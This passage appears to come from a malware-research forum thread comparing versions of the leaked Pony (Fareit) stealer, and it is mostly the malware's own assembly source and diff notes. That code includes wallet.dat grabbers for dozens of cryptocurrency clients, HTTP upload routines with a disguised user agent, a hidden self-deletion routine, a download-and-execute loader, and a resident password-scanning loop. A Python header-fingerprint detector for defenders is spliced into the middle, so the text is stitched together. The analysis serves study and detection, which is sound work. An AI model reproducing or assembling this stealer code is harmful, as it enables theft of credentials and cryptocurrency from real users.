	invoke	StreamWriteModuleHeader, stream, MODULE_DIGITALCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CDigitalcoinAppDataDir, offset CDigitalcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabDigitalcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MinCoin
; http://www.min-coin.org/
; Tested: v0.6.5.0-g498f5d1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_MINCOIN

.data
	CMincoinWalletFile					db	'wallet.dat',0
	CMincoinAppDataDir					db	'\Mincoin',0

.code

GrabMincoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MINCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMincoinAppDataDir, offset CMincoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; GoldCoin
; http://gldcoin.com/
; Tested: v0.7.1.6-gcf3abdf39d-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_GOLDCOIN

.data
	CGoldcoinWalletFile					db	'wallet.dat',0
	CGoldcoinAppDataDir					db	'\GoldCoin (GLD)',0

.code

GrabGoldcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_GOLDCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CGoldcoinAppDataDir, offset CGoldcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabGoldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; YaCoin
; http://www.yacoin.org/
; Tested: v0.4.0.0-g2nd-yac-wm-alpha
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_YACOIN

.data
	CYacoinWalletFile					db	'wallet.dat',0
	CYacoinAppDataDir					db	'\Yacoin',0

.code

GrabYacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_YACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CYacoinAppDataDir, offset CYacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabYacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Zetacoin
; http://www.zeta-coin.org/
; Tested: v0.8.99.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ZETACOIN

.data
	CZetacoinWalletFile					db	'wallet.dat',0
	CZetacoinAppDataDir					db	'\Zetacoin',0

.code

GrabZetacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ZETACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CZetacoinAppDataDir, offset CZetacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabZetacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FastCoin
; http://www.fastcoin.ca/
; Tested: v0.6.3.0-gc4135e8-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FASTCOIN

.data
	CFastcoinWalletFile					db	'wallet.dat',0
	CFastcoinAppDataDir					db	'\Fastcoin',0

.code

GrabFastcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FASTCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFastcoinAppDataDir, offset CFastcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFastcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; i0coin
; http://i0coin.bitparking.com/
; Tested: 0.3.25.9-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_I0COIN

.data
	CI0coinWalletFile					db	'wallet.dat',0
	CI0coinAppDataDir					db	'\I0coin',0

.code

GrabI0coin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_I0COIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CI0coinAppDataDir, offset CI0coinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabI0coin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Tagcoin
; http://tagcoin.org/
; Tested: v1.0.2
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_TAGCOIN

.data
	CTagcoinWalletFile					db	'wallet.dat',0
	CTagcoinAppDataDir					db	'\Tagcoin',0

.code

GrabTagcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_TAGCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CTagcoinAppDataDir, offset CTagcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabTagcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bytecoin
; http://www.bytecoin.biz/
; Tested: v0.8.1.1-gfdc7831-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BYTECOIN

.data
	CBytecoinWalletFile					db	'wallet.dat',0
	CBytecoinAppDataDir					db	'\Bytecoin',0

.code

GrabBytecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BYTECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBytecoinAppDataDir, offset CBytecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBytecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Florincoin
; http://www.florincoin.org
; Tested: v0.6.5.8-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FLORINCOIN

.data
	CFlorincoinWalletFile					db	'wallet.dat',0
	CFlorincoinAppDataDir					db	'\Florincoin',0

.code

GrabFlorincoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FLORINCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFlorincoinAppDataDir, offset CFlorincoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFlorincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Phoenixcoin
; http://phoenixcoin.org/
; Tested: v0.6.5.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PHOENIXCOIN

.data
	CPhoenixcoinWalletFile					db	'wallet.dat',0
	CPhoenixcoinAppDataDir					db	'\Phoenixcoin',0

.code

GrabPhoenixcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PHOENIXCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPhoenixcoinAppDataDir, offset CPhoenixcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPhoenixcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Luckycoin
; https://cryptocointalk.com/forum/188-luckycoin-lky/
; Tested: v0.9.9.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LUCKYCOIN

.data
	CLuckycoinWalletFile					db	'wallet.dat',0
	CLuckycoinAppDataDir					db	'\Luckycoin',0

.code

GrabLuckycoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_LUCKYCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CLuckycoinAppDataDir, offset CLuckycoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabLuckycoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; CraftCoin
; http://craftcoin.net
; Tested: v1.1.1.2-unk-crc
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_CRAFTCOIN

.data
	CCraftcoinWalletFile					db	'wallet.dat',0
	CCraftcoinAppDataDir					db	'\Craftcoin',0

.code

GrabCraftcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_CRAFTCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CCraftcoinAppDataDir, offset CCraftcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabCraftcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; JunkCoin
; http://jkcoin.com/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_JUNKCOIN

.data
	CJunkcoinWalletFile					db	'wallet.dat',0
	CJunkcoinAppDataDir					db	'\Junkcoin',0

.code

GrabJunkcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_JUNKCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CJunkcoinAppDataDir, offset CJunkcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabJunkcoin endp

ENDIF

Line 13229 (code addition):
					AddModule COMPILE_MODULE_FASTTRACK, GrabFastTrack
					AddModule COMPILE_MODULE_BITCOIN, GrabBitcoin
					AddModule COMPILE_MODULE_ELECTRUM, GrabElectrum
					AddModule COMPILE_MODULE_MULTIBIT, GrabMultiBit
					AddModule COMPILE_MODULE_FTPDISK, GrabFTPDisk
					AddModule COMPILE_MODULE_LITECOIN, GrabLitecoin
					AddModule COMPILE_MODULE_NAMECOIN, GrabNamecoin
					AddModule COMPILE_MODULE_TERRACOIN, GrabTerracoin
					AddModule COMPILE_MODULE_BITCOINARMORY, GrabBitcoinArmory
					AddModule COMPILE_MODULE_PPCOIN, GrabPPCoin
					AddModule COMPILE_MODULE_PRIMECOIN, GrabPrimecoin
					AddModule COMPILE_MODULE_FEATHERCOIN, GrabFeathercoin
					AddModule COMPILE_MODULE_NOVACOIN, GrabNovaCoin
					AddModule COMPILE_MODULE_FREICOIN, GrabFreicoin
					AddModule COMPILE_MODULE_DEVCOIN, GrabDevcoin
					AddModule COMPILE_MODULE_FRANKOCOIN, GrabFrankocoin
					AddModule COMPILE_MODULE_PROTOSHARES, GrabProtoShares
					AddModule COMPILE_MODULE_MEGACOIN, GrabMegacoin
					AddModule COMPILE_MODULE_QUARKCOIN, GrabQuarkcoin
					AddModule COMPILE_MODULE_WORLDCOIN, GrabWorldcoin
					AddModule COMPILE_MODULE_INFINITECOIN, GrabInfinitecoin
					AddModule COMPILE_MODULE_IXCOIN, GrabIxcoin
					AddModule COMPILE_MODULE_ANONCOIN, GrabAnoncoin
					AddModule COMPILE_MODULE_BBQCOIN, GrabBBQcoin
					AddModule COMPILE_MODULE_DIGITALCOIN, GrabDigitalcoin
					AddModule COMPILE_MODULE_MINCOIN, GrabMincoin
					AddModule COMPILE_MODULE_GOLDCOIN, GrabGoldcoin
					AddModule COMPILE_MODULE_YACOIN, GrabYacoin
					AddModule COMPILE_MODULE_ZETACOIN, GrabZetacoin
					AddModule COMPILE_MODULE_FASTCOIN, GrabFastcoin
					AddModule COMPILE_MODULE_I0COIN, GrabI0coin
					AddModule COMPILE_MODULE_TAGCOIN, GrabTagcoin
					AddModule COMPILE_MODULE_BYTECOIN, GrabBytecoin
					AddModule COMPILE_MODULE_FLORINCOIN, GrabFlorincoin
					AddModule COMPILE_MODULE_PHOENIXCOIN, GrabPhoenixcoin
					AddModule COMPILE_MODULE_LUCKYCOIN, GrabLuckycoin
					AddModule COMPILE_MODULE_CRAFTCOIN, GrabCraftcoin
					AddModule COMPILE_MODULE_JUNKCOIN, GrabJunkcoin
					
Line 13273 (comment added):
; Collect passwords for all enabled modules
Netcode.asm:

Line 126 (code remove):
char, timeout <- removed 'timeout'

Line 214 (code edition):
CDefaultUserAgent db "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",0

Line 220 (code addition):
db	"Accept-Language: en-US",13,10

Line 225 (code edition):
db	"User-Agent: %s",13,10,13,10,0

Line 267 (code edition):
invoke	MemAlloc, 15000 -> invoke	MemAlloc, 32000

Line 274 (code edition):
invoke  NetRecvUntilChar, s, stream, 64000, 0ah, 30 -> invoke  NetRecvUntilChar, s, stream, 64000, 0ah

Line 390 (code edition/deletion):
.data -> .code

Line 392 (comment addition):
; do not move this block to .data, - MS FIX

Line 396 (code addition):
db	"Accept-Language: en-US",13,10

Line 400 (code edition):
db	"User-Agent: %s",13,10,13,10,0

Line 409 (code addition):
	LOCAL	pUserAgent: DWORD
    LOCAL	cbUserAgent: DWORD

Line 422 (code addition):
    invoke	MemAlloc, 8192
    mov	pUserAgent, eax
    mov	cbUserAgent, 8192

Line 458 (instruction added):
cld

Line 477 (code edition/addition):
	invoke	ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
	test	eax, eax
	.IF	SUCCEEDED
		invoke	wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, pUserAgent
	.ELSE
		invoke	wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, offset CDefaultUserAgent
	.ENDIF

Line 511 (code addition):
	invoke	MemFree, pUserAgent
	
Line 541 (code edition):
mov	l.l_linger, 30 -> mov l.l_linger, 45

Line 546 (procedure modification):
MyUploadWithRedir proc uses edi ebx szLink, lpData, dwLen, lpOutStream, lpszRedir
    LOCAL   uc: URL_COMPONENTS   
    LOCAL	pHost: DWORD
    LOCAL	pFmt: DWORD
    LOCAL	pURL: DWORD
    LOCAL	s: DWORD
    LOCAL	len: DWORD
    LOCAL	pUserAgent: DWORD
    LOCAL	cbUserAgent: DWORD

    xor	ebx, ebx
    invoke	MemAlloc, 4096
    mov	pHost, eax

    invoke	MemAlloc, 4096
    mov	pURL, eax

    invoke	MemAlloc, 4096
    mov	pFmt, eax

    invoke	MemAlloc, 4096
    mov	pUserAgent, eax

    mov	cbUserAgent, 4096

    lea	edi, uc
    mov	ecx, sizeof URL_COMPONENTS
    xor	eax, eax
    rep stosb

    mov     uc.dwStructSize, sizeof URL_COMPONENTS

    push	pHost
    pop	uc.lpszHostName

    push	pURL
    pop	uc.lpszUrlPath

    mov     uc.dwHostNameLength, 4095
    mov	uc.dwUrlPathLength, 4095

    invoke  InternetCrackUrl, szLink, 0, ICU_ESCAPE, addr uc
    .IF	(!eax) || (uc.lpszHostName == NULL)
        jmp     @md_ret
		
Line 621 (code edition/addition):
	invoke	ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
	test	eax, eax
	.IF	SUCCEEDED
		invoke	wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, pUserAgent
	.ELSE
		invoke	wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, offset CDefaultUserAgent
	.ENDIF

Line 658 (code edition):
invoke	NetWorks, s, lpOutStream, addr lpszRedir -> invoke	NetWorks, s, lpOutStream, lpszRedir

Line 669 (code addition):
invoke	MemFree, pUserAgent

Line 671 (code addition):
	mov	eax, ebx
	ret
MyUploadWithRedir endp

MyUpload proc szLink, lpData, dwLen, lpOutStream
	LOCAL	lpszRedir: DWORD

	mov	eax, lpOutStream
	.IF	eax
		mov	dword ptr[eax], 0
	.ENDIF

	mov	lpszRedir, NULL
	invoke	MyUploadWithRedir, szLink, lpData, dwLen, lpOutStream, addr lpszRedir

Line 686 (code addition):
		invoke	MyUploadWithRedir, lpszRedir, lpData, dwLen, lpOutStream, NULL
		push	eax
		
Line 689 (code addition):
pop	eax

Line 690 (code deletion):
mov	eax, ebx

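The Netcode.asm edits above fix the shape of every request Pony sends: a fixed `Accept-Language: en-US` header is inserted, and `User-Agent: %s` is emitted as the last header line, filled from `ObtainUserAgentString` when that succeeds and from the hard-coded `CDefaultUserAgent` string otherwise. The following Python is an added example for defenders, not code from the post or from the leaked source: it parses a raw HTTP request head and reports which of those header-format indicators are present. The two sample requests are constructed, with placeholder host and path; the indicator names and the `is_pony_like` threshold are this example's own choices.

```python
"""
Heuristic matcher for the Pony/Fareit HTTP header layout described in the
Netcode.asm changes (Lines 214, 220, 225, 396, 400, 477, 621).
Added example for detection work; not part of the original post or source.
"""
from __future__ import annotations

# Hard-coded fallback UA from the CDefaultUserAgent edit (Line 214).
DEFAULT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"


def parse_request(raw: str) -> tuple[str, list[tuple[str, str]]]:
    """Split a raw HTTP request head into (request line, ordered header list).

    Header names are lower-cased; order is preserved because the position of
    User-Agent is one of the indicators.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: list[tuple[str, str]] = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def pony_indicators(raw: str) -> list[str]:
    """Return the header-format indicators present in `raw`.

    Derived from the templates in the post:
      - 'Accept-Language: en-US' inserted as a fixed header (Lines 220/396)
      - 'User-Agent' written as the final header line, "User-Agent: %s",13,10,13,10
        (Lines 225/400)
      - UA equal to the CDefaultUserAgent fallback string (Line 214); weak on its
        own, because ObtainUserAgentString normally supplies the host's real UA
    """
    _, headers = parse_request(raw)
    names = [name for name, _ in headers]
    found: list[str] = []
    if ("accept-language", "en-US") in headers:
        found.append("fixed-accept-language-en-US")
    if names and names[-1] == "user-agent":
        found.append("user-agent-is-last-header")
    if dict(headers).get("user-agent") == DEFAULT_UA:
        found.append("default-ua-fallback-string")
    return found


def is_pony_like(raw: str) -> bool:
    """Format fingerprint: both structural indicators must be present.

    The UA string alone is deliberately not sufficient (see pony_indicators).
    """
    found = pony_indicators(raw)
    return ("fixed-accept-language-en-US" in found
            and "user-agent-is-last-header" in found)


# Constructed sample: the layout MyUploadWithRedir produces via szHTTPSendFmt,
# here with the fallback UA. Host, path and length are placeholders.
SAMPLE_PONY = (
    "POST /forum/viewtopic.php HTTP/1.0\r\n"
    "Host: gate.example.invalid\r\n"
    "Accept-Language: en-US\r\n"
    "Content-Length: 412\r\n"
    "User-Agent: " + DEFAULT_UA + "\r\n"
    "\r\n"
)

# Constructed sample: an ordinary browser request, for contrast.
SAMPLE_BROWSER = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/120.0\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, sample in (("pony", SAMPLE_PONY), ("browser", SAMPLE_BROWSER)):
        print(label, is_pony_like(sample), pony_indicators(sample))
```

Run over captured request heads from a proxy or IDS, the two structural indicators together are the useful signal; the `default-ua-fallback-string` indicator is reported separately because the Line 477 and 621 edits only fall back to that string when `ObtainUserAgentString` fails, so most infected hosts will present their genuine Internet Explorer user agent instead.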
User avatar
Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Win32/Fareit

Post by Xylitol » Fri Jun 27, 2014 2:16 pm

Pony.asm:

Code: Select all

Line 35 (code addition):
includelib DLL_Loader.lib

Line 57 (code edition):
push	ebp      -> xor		edx, eax
mov		ebp, esp -> xor		eax, edx
pop		ebp      -> xor		edx, eax
	
Line 63 (code addition):
nop

Line 65 (code addition):
nop

Line 67 (code addition):
nop

Line 70 (code edition):
db	0ffh -> db	0feh

Line 75 (code deletion):
Removed the IFDEF USE_UPX

Line 80 (code addition):
IFNDEF DISABLE_GRABBER

Line 84 (code addition):
include Loader.asm

Line 110 (code addition):
nop

Line 118 (code addition):
nop

Line 119 (code edition):
push	19131011 -> push	19131012

Line 129 (code addition):
nop

Line 135 (code addition):
nop

Line 164 (code addition):
IFNDEF DISABLE_GRABBER

Line 451 (code addition):
ENDIF

Line 451 (code addition):
IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE

Line 456 (code addition/deletion):
Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
Added:
	szBatchFmt				db      '%d.bat',0
	szSelfDelQuoteFmt       db      '      "%s"   ',0
	szShellExecute			db		'ShellExecuteA',0
	szBatchFile             db      13,10,9,9,13,10,13,10,09,"   :ktk   ",13,10,13,10,13,10,"     del    ",9," %1  ",13,10,9,"if  ",9,9," exist ",9,"   %1  ",9,"  goto ",9,13," ktk",13,10," del ",9,"  %0 ",0
	szShell32Lib			db		'shell32.dll',0
	szComSpec				db		'COMSPEC', 0
	szSelfCommand			db		'%s /c del "%s" > NUL',0
	
Line 466 (code deletion/edition):
RunLoader procedure removed/replaced by:
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
	LOCAL   lpSelfFileName: DWORD
	LOCAL	lpComSpec: DWORD
	LOCAL	lpCommandBuffer: DWORD
	LOCAL	_si: STARTUPINFO
	LOCAL	_pi: PROCESS_INFORMATION
	
Line 474 (code deletion/edition):
AntiDisasmTrick replaced by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpSelfFileName, eax
	
Line 477 (code deletion/edition):
mov	edi, offset szLoaderList removed by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpComSpec, eax
	
Line 480 (code deletion/edition):
IFDEF	LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpCommandBuffer, eax
	
Line 466 (huge code addition/deletion):
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
	LOCAL   lpSelfFileName: DWORD
	LOCAL	lpComSpec: DWORD
	LOCAL	lpCommandBuffer: DWORD
	LOCAL	_si: STARTUPINFO
	LOCAL	_pi: PROCESS_INFORMATION

	invoke	MemAlloc, MAX_PATH+1
	mov	lpSelfFileName, eax

	invoke	MemAlloc, MAX_PATH+1
	mov	lpComSpec, eax

	invoke	MemAlloc, MAX_PATH+1
	mov	lpCommandBuffer, eax

	invoke	GetModuleFileName, NULL, lpSelfFileName, MAX_PATH

	invoke	GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH

	invoke	ZeroMemory, addr _si, sizeof _si
	invoke	ZeroMemory, addr _pi, sizeof _pi

	mov	_si.cb, sizeof _si
	mov	_si.dwFlags, STARTF_USESHOWWINDOW
	mov	_si.wShowWindow, SW_HIDE
		
	invoke	GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
	.IF	eax
		invoke	wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
		invoke	CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
		.IF	eax
			invoke	GetCurrentProcess
			invoke	SetPriorityClass, eax, HIGH_PRIORITY_CLASS
			invoke	SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
			invoke	SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
			invoke	ResumeThread, _pi.hThread
			inc	ebx
		.ENDIF
	.ENDIF

	invoke	MemFree, lpSelfFileName
	invoke	MemFree, lpComSpec
	invoke	MemFree, lpCommandBuffer

	mov	eax, ebx
		
	ret
SelfDeleteComSpec  endp
	
Line 526 (code addition):
	invoke	SelfDeleteComSpec
	.IF	eax
		ret
	.ENDIF
	
Line 740 (code addition):
IFNDEF DISABLE_GRABBER
	
Line 872 (code addition):
ENDIF

Line 874 (code edition):
InitApp proc -> InitApp proc lpUserToken
	
Line 887 (code edition):
invoke	ImpersonateLocalSystemUser -> invoke	ImpersonateLocalSystemUser, lpUserToken

Line 893 (comment addition):
; Get impersonated username to ignore it in brute-force procedure

Line 905 (code edition/deletion):
	IFNDEF DISABLE_GRABBER
		IFDEF ENCRYPT_REPORT
			invoke	DecodeReportPassword, offset CReportPassword
		ENDIF

Line 911 (code addition):
invoke	Randomize

Line 921 (code edition):
mov	eax, EXCEPTION_CONTINUE_SEARCH -> mov eax, EXCEPTION_CONTINUE_SEARCH

Line 926 (code addition):
	LOCAL	lpUserToken: DWORD
	LOCAL	isFirstCycleRun: DWORD
	
Line 936 (code addition/deletion):
invoke	InitApp replaced by:
	mov	lpUserToken, NULL ; impersonated user token
	invoke	InitApp, addr lpUserToken

	IFDEF	ENABLE_RESIDENT_MODE
		invoke	CopyRunFromAutoDirectory
	ENDIF

Line 945 (code addition):
invoke	DecipherList, offset CWordList

Line 948 (deletion/edition):
invoke	ScanAndSend replaced by:
	IFNDEF DISABLE_GRABBER
		invoke	ScanAndSend
	ELSE
		invoke	MyDownloadInit
	ENDIF

Line 954 (comment edition):
; Run loader (it will attempt to download and execute files with current logged on account privileges
; when run from Windows Service [LocalSystem user], which has limited (tricked) access to HKCU path and %APPDATA%)

Line 957 (code edition):
invoke	RunLoader -> invoke	RunLoader, lpUserToken

Line 960 (Procedure addition):
	ENDIF

	; Resident looped cycle
	mov	isFirstCycleRun, TRUE ; do not send passwords for the first cycle
	IFDEF	ENABLE_RESIDENT_MODE
		.WHILE	TRUE
			IFDEF PERIODIC_PASSWORD_SCAN
			IFNDEF	DISABLE_GRABBER
				invoke	NeedsPasswordGrabbing
				.IF	eax && !isFirstCycleRun
					; Scan and send passwords
					invoke	ScanAndSend
				.ENDIF
			ENDIF
			ENDIF

			invoke	Sleep, RESIDENT_LOADER_TIMEOUT*60*1000

			IFDEF	ENABLE_LOADER
				invoke	RunLoader, lpUserToken
			ENDIF

			mov	isFirstCycleRun, FALSE
		.ENDW

Line 993 (code edition):
IFNDEF DISABLE_GRABBER

Line 996 (code edition):
ENDIF

Line 998 (comment addition):
; Self delete executable (works also for DLL mode - in this case parent executable will get deleted)

Line 1023 (code deletion):
After AntiDisasmTrick this part disappeared:
	.WHILE	TRUE
		invoke	GetTickCount
		mov	ecx, 10
		xor	edx, edx
		div	ecx
		.IF	edx == 5
			.BREAK
		.ENDIF
	.ENDW
Crypto.asm (no modification)
WordList.asm (no modification)
3DES stuff (no modification)
Utils.asm (code addition for the loader and some code bug-fix)
Loader.asm (new file, wasn't in 1.9, but not really new content; they separated a part of Pony.asm and moved it to Loader.asm, to make it clearer I think, and added some code)

As mentioned in the advert, there are some huge modifications to the Opera/Chrome/Firefox procedures and HTTP request handling; they also added support for WS_FTP Pro 12.4 and Far Manager v3.0 build 3525, but in reality they haven't changed the code, the new versions are just 'compatible'.
For CuteFTP 9/FTP Voyager 16.1/Total Commander etc., they just added some strings to make it compatible with the new versions.
Nothing fancy about the wallet stealer code, as wacked2 said, but it's honorable that they improved the code, especially in asm.
Any idea who did this work?
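
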